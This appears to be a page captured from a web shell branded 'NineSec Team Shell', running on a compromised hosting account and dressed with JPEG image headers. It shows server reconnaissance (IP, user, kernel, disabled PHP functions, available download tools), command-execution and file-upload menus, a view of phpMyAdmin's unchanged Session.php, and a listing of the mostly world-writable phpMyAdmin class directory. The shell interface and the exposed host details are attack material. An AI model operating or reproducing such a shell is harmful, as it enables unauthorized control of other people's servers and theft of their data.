�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/domains/demo.readytorun.it/public_html/phmad/libraries/classes/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/domains/demo.readytorun.it/public_html/phmad/libraries/classes/Session.php
<?php
/**
 * Session handling
 *
 * @see     https://www.php.net/manual/en/features.sessions.php
 */

declare(strict_types=1);

namespace PhpMyAdmin;

use function function_exists;
use function htmlspecialchars;
use function implode;
use function ini_get;
use function ini_set;
use function preg_replace;
use function session_abort;
use function session_cache_limiter;
use function session_destroy;
use function session_id;
use function session_name;
use function session_regenerate_id;
use function session_save_path;
use function session_set_cookie_params;
use function session_start;
use function session_status;
use function session_unset;
use function session_write_close;
use function setcookie;

use const PHP_SESSION_ACTIVE;
use const PHP_VERSION_ID;

/**
 * Session class
 */
class Session
{
    /**
     * Generates PMA_token session variable.
     */
    private static function generateToken(): void
    {
        $_SESSION[' PMA_token '] = Util::generateRandom(16, true);
        $_SESSION[' HMAC_secret '] = Util::generateRandom(16);

        /**
         * Check if token is properly generated (the generation can fail, for example
         * due to missing /dev/random for openssl).
         */
        if (! empty($_SESSION[' PMA_token '])) {
            return;
        }

        Core::fatalError('Failed to generate random CSRF token!');
    }

    /**
     * tries to secure session from hijacking and fixation
     * should be called before login and after successful login
     * (only required if sensitive information stored in session)
     */
    public static function secure(): void
    {
        // prevent session fixation and XSS
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }

        // continue with empty session
        session_unset();
        self::generateToken();
    }

    /**
     * Session failed function
     *
     * @param array $errors PhpMyAdmin\ErrorHandler array
     */
    private static function sessionFailed(array $errors): void
    {
        $messages = [];
        foreach ($errors as $error) {
            /*
             * Remove path from open() in error message to avoid path disclossure
             *
             * This can happen with PHP 5 when nonexisting session ID is provided,
             * since PHP 7, session existence is checked first.
             *
             * This error can also happen in case of session backed error (eg.
             * read only filesystem) on any PHP version.
             *
             * The message string is currently hardcoded in PHP, so hopefully it
             * will not change in future.
             */
            $messages[] = preg_replace(
                '/open\(.*, O_RDWR\)/',
                'open(SESSION_FILE, O_RDWR)',
                htmlspecialchars($error->getMessage())
            );
        }

        /*
         * Session initialization is done before selecting language, so we
         * can not use translations here.
         */
        Core::fatalError(
            'Error during session start; please check your PHP and/or '
            . 'webserver log file and configure your PHP '
            . 'installation properly. Also ensure that cookies are enabled '
            . 'in your browser.'
            . '<br><br>'
            . implode('<br><br>', $messages)
        );
    }

    /**
     * Set up session
     *
     * @param Config       $config       Configuration handler
     * @param ErrorHandler $errorHandler Error handler
     */
    public static function setUp(Config $config, ErrorHandler $errorHandler): void
    {
        // verify if PHP supports session, die if it does not
        if (! function_exists('session_name')) {
            Core::warnMissingExtension('session', true);
        } elseif (! empty(ini_get('session.auto_start')) && session_name() !== 'phpMyAdmin' && ! empty(session_id())) {
            // Do not delete the existing non empty session, it might be used by
            // other applications; instead just close it.
            if (empty($_SESSION)) {
                // Ignore errors as this might have been destroyed in other
                // request meanwhile
                @session_destroy();
            } else {
                // do not use session_write_close, see issue #13392
                session_abort();
            }
        }

        /** @psalm-var 'Lax'|'Strict'|'None' $cookieSameSite */
        $cookieSameSite = $config->get('CookieSameSite') ?? 'Strict';
        $cookiePath = $config->getRootPath();
        if (PHP_VERSION_ID < 70300) {
            $cookiePath .= '; SameSite=' . $cookieSameSite;
        }

        // session cookie settings
        session_set_cookie_params(
            0,
            $cookiePath,
            '',
            $config->isHttps(),
            true
        );

        // cookies are safer (use ini_set() in case this function is disabled)
        ini_set('session.use_cookies', 'true');

        // optionally set session_save_path
        $path = $config->get('SessionSavePath');
        if (! empty($path)) {
            session_save_path($path);
            // We can not do this unconditionally as this would break
            // any more complex setup (eg. cluster), see
            // https://github.com/phpmyadmin/phpmyadmin/issues/8346
            ini_set('session.save_handler', 'files');
        }

        // use cookies only
        ini_set('session.use_only_cookies', '1');
        // strict session mode (do not accept random string as session ID)
        ini_set('session.use_strict_mode', '1');
        // make the session cookie HttpOnly
        ini_set('session.cookie_httponly', '1');
        if (PHP_VERSION_ID >= 70300) {
            // add SameSite to the session cookie
            ini_set('session.cookie_samesite', $cookieSameSite);
        }

        // do not force transparent session ids
        ini_set('session.use_trans_sid', '0');

        // delete session/cookies when browser is closed
        ini_set('session.cookie_lifetime', '0');

        // some pages (e.g. stylesheet) may be cached on clients, but not in shared
        // proxy servers
        session_cache_limiter('private');

        $httpCookieName = $config->getCookieName('phpMyAdmin');
        @session_name($httpCookieName);

        // Restore correct session ID (it might have been reset by auto started session
        if ($config->issetCookie('phpMyAdmin')) {
            session_id($config->getCookie('phpMyAdmin'));
        }

        // on first start of session we check for errors
        // f.e. session dir cannot be accessed - session file not created
        $orig_error_count = $errorHandler->countErrors(false);

        $session_result = session_start();

        if ($session_result !== true || $orig_error_count != $errorHandler->countErrors(false)) {
            setcookie($httpCookieName, '', 1);
            $errors = $errorHandler->sliceErrors($orig_error_count);
            self::sessionFailed($errors);
        }

        unset($orig_error_count, $session_result);

        /**
         * Disable setting of session cookies for further session_start() calls.
         */
        if (session_status() !== PHP_SESSION_ACTIVE) {
            ini_set('session.use_cookies', 'true');
        }

        /**
         * Token which is used for authenticating access queries.
         * (we use "space PMA_token space" to prevent overwriting)
         */
        if (! empty($_SESSION[' PMA_token '])) {
            return;
        }

        self::generateToken();

        /**
         * Check for disk space on session storage by trying to write it.
         *
         * This seems to be most reliable approach to test if sessions are working,
         * otherwise the check would fail with custom session backends.
         */
        $orig_error_count = $errorHandler->countErrors();
        session_write_close();
        if ($errorHandler->countErrors() > $orig_error_count) {
            $errors = $errorHandler->sliceErrors($orig_error_count);
            self::sessionFailed($errors);
        }

        session_start();
        if (! empty($_SESSION[' PMA_token '])) {
            return;
        }

        Core::fatalError('Failed to store CSRF token in session! Probably sessions are not working properly.');
    }
}

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
September 11 2024 5:18:57
readytorun
0755
Charsets
--
September 11 2024 5:18:57
readytorun
0755
Command
--
September 11 2024 5:18:57
readytorun
0755
Config
--
September 11 2024 5:18:57
readytorun
0755
ConfigStorage
--
September 11 2024 5:18:57
readytorun
0755
Controllers
--
September 11 2024 5:18:57
readytorun
0755
Crypto
--
September 11 2024 5:18:57
readytorun
0755
Database
--
September 11 2024 5:18:57
readytorun
0755
Dbal
--
September 11 2024 5:18:57
readytorun
0755
Display
--
September 11 2024 5:18:57
readytorun
0755
Engines
--
September 11 2024 5:18:57
readytorun
0755
Exceptions
--
September 11 2024 5:18:57
readytorun
0755
Export
--
September 11 2024 5:18:57
readytorun
0755
Gis
--
September 11 2024 5:18:57
readytorun
0755
Html
--
September 11 2024 5:18:57
readytorun
0755
Http
--
September 11 2024 5:18:57
readytorun
0755
Image
--
September 11 2024 5:18:57
readytorun
0755
Import
--
September 11 2024 5:18:57
readytorun
0755
Navigation
--
September 11 2024 5:18:57
readytorun
0755
Partitioning
--
September 11 2024 5:18:57
readytorun
0755
Plugins
--
September 11 2024 5:18:57
readytorun
0755
Properties
--
September 11 2024 5:18:57
readytorun
0755
Providers
--
September 11 2024 5:18:57
readytorun
0755
Query
--
September 11 2024 5:18:57
readytorun
0755
Server
--
September 11 2024 5:18:57
readytorun
0755
Setup
--
September 11 2024 5:18:57
readytorun
0755
Table
--
September 11 2024 5:18:57
readytorun
0755
Twig
--
September 11 2024 5:18:57
readytorun
0755
Utils
--
September 11 2024 5:18:57
readytorun
0755
.htaccess
0.124 KB
November 14 2025 9:26:18
readytorun
0444
Advisor.php
12.317 KB
August 28 2023 5:04:12
readytorun
0777
Bookmark.php
9.188 KB
August 28 2023 5:04:12
readytorun
0777
BrowseForeigners.php
10.644 KB
August 28 2023 5:04:12
readytorun
0777
Cache.php
1.502 KB
August 28 2023 5:04:11
readytorun
0777
Charsets.php
6.823 KB
August 28 2023 5:04:12
readytorun
0777
CheckUserPrivileges.php
11.303 KB
August 28 2023 5:04:12
readytorun
0777
Common.php
19.156 KB
August 28 2023 5:04:12
readytorun
0777
Config.php
41.534 KB
August 28 2023 5:04:12
readytorun
0777
Console.php
3.251 KB
August 28 2023 5:04:12
readytorun
0777
Core.php
29.376 KB
August 28 2023 5:04:13
readytorun
0777
CreateAddField.php
15.951 KB
August 28 2023 5:04:11
readytorun
0777
DatabaseInterface.php
71.577 KB
August 28 2023 5:04:12
readytorun
0777
DbTableExists.php
2.859 KB
August 28 2023 5:04:12
readytorun
0777
Encoding.php
8.41 KB
August 28 2023 5:04:12
readytorun
0777
Error.php
13.626 KB
August 28 2023 5:04:12
readytorun
0777
ErrorHandler.php
18.225 KB
August 28 2023 5:04:12
readytorun
0777
ErrorReport.php
8.988 KB
August 28 2023 5:04:11
readytorun
0777
Export.php
45.555 KB
August 28 2023 5:04:11
readytorun
0777
FieldMetadata.php
11.244 KB
August 28 2023 5:04:12
readytorun
0777
File.php
19.745 KB
August 28 2023 5:04:11
readytorun
0777
FileListing.php
2.877 KB
August 28 2023 5:04:12
readytorun
0777
FlashMessages.php
1.217 KB
August 28 2023 5:04:12
readytorun
0777
Font.php
5.54 KB
August 28 2023 5:04:12
readytorun
0777
Footer.php
8.061 KB
August 28 2023 5:04:12
readytorun
0777
Git.php
17.859 KB
August 28 2023 5:04:11
readytorun
0777
Header.php
19.871 KB
August 28 2023 5:04:12
readytorun
0777
Import.php
48.719 KB
August 28 2023 5:04:11
readytorun
0777
Index.php
14.83 KB
August 28 2023 5:04:11
readytorun
0777
IndexColumn.php
4.755 KB
August 28 2023 5:04:12
readytorun
0777
InsertEdit.php
89.076 KB
August 28 2023 5:04:11
readytorun
0777
InternalRelations.php
17.314 KB
August 28 2023 5:04:11
readytorun
0777
IpAllowDeny.php
9.13 KB
August 28 2023 5:04:11
readytorun
0777
Language.php
4.473 KB
August 28 2023 5:04:12
readytorun
0777
LanguageManager.php
22.641 KB
August 28 2023 5:04:13
readytorun
0777
Linter.php
4.988 KB
August 28 2023 5:04:12
readytorun
0777
ListAbstract.php
1.669 KB
August 28 2023 5:04:11
readytorun
0777
ListDatabase.php
4.112 KB
August 28 2023 5:04:11
readytorun
0777
Logging.php
2.691 KB
August 28 2023 5:04:13
readytorun
0777
Menu.php
20.401 KB
August 28 2023 5:04:12
readytorun
0777
Message.php
18.68 KB
August 28 2023 5:04:13
readytorun
0777
Mime.php
0.896 KB
August 28 2023 5:04:12
readytorun
0777
Normalization.php
41.575 KB
August 28 2023 5:04:12
readytorun
0777
OpenDocument.php
8.619 KB
August 28 2023 5:04:11
readytorun
0777
Operations.php
35.114 KB
August 28 2023 5:04:12
readytorun
0777
OutputBuffering.php
4.099 KB
August 28 2023 5:04:13
readytorun
0777
ParseAnalyze.php
2.337 KB
August 28 2023 5:04:11
readytorun
0777
Pdf.php
4.174 KB
August 28 2023 5:04:12
readytorun
0777
Plugins.php
21.82 KB
August 28 2023 5:04:12
readytorun
0777
Profiling.php
2.158 KB
August 28 2023 5:04:11
readytorun
0777
RecentFavoriteTable.php
11.436 KB
August 28 2023 5:04:13
readytorun
0777
Replication.php
4.81 KB
August 28 2023 5:04:12
readytorun
0777
ReplicationGui.php
21.239 KB
August 28 2023 5:04:11
readytorun
0777
ReplicationInfo.php
4.792 KB
August 28 2023 5:04:11
readytorun
0777
ResponseRenderer.php
13.495 KB
August 28 2023 5:04:11
readytorun
0777
Routing.php
5.971 KB
August 28 2023 5:04:12
readytorun
0777
Sanitize.php
11.981 KB
August 28 2023 5:04:11
readytorun
0777
SavedSearches.php
11.328 KB
August 28 2023 5:04:12
readytorun
0777
Scripts.php
3.738 KB
August 28 2023 5:04:11
readytorun
0777
Session.php
8.162 KB
August 28 2023 5:04:11
readytorun
0777
Sql.php
63.988 KB
August 28 2023 5:04:12
readytorun
0777
SqlQueryForm.php
6.742 KB
August 28 2023 5:04:12
readytorun
0777
StorageEngine.php
15.723 KB
August 28 2023 5:04:12
readytorun
0777
SystemDatabase.php
3.98 KB
August 28 2023 5:04:11
readytorun
0777
Table.php
90.179 KB
August 28 2023 5:04:13
readytorun
0777
Template.php
4.505 KB
August 28 2023 5:04:12
readytorun
0777
Theme.php
7.319 KB
August 28 2023 5:04:12
readytorun
0777
ThemeManager.php
6.999 KB
August 28 2023 5:04:12
readytorun
0777
Tracker.php
30.337 KB
August 28 2023 5:04:12
readytorun
0777
Tracking.php
36.106 KB
August 28 2023 5:04:12
readytorun
0777
Transformations.php
16.314 KB
August 28 2023 5:04:12
readytorun
0777
TwoFactor.php
6.979 KB
August 28 2023 5:04:11
readytorun
0777
Types.php
24.739 KB
August 28 2023 5:04:12
readytorun
0777
Url.php
10.608 KB
August 28 2023 5:04:12
readytorun
0777
UrlRedirector.php
1.735 KB
August 28 2023 5:04:12
readytorun
0777
UserPassword.php
6.859 KB
August 28 2023 5:04:11
readytorun
0777
UserPreferences.php
10.488 KB
August 28 2023 5:04:12
readytorun
0777
Util.php
85.741 KB
August 28 2023 5:04:12
readytorun
0777
Version.php
0.543 KB
August 28 2023 5:04:12
readytorun
0777
VersionInformation.php
7.3 KB
August 28 2023 5:04:13
readytorun
0777
ZipExtension.php
10.334 KB
August 28 2023 5:04:12
readytorun
0777

NineSec Team - 2022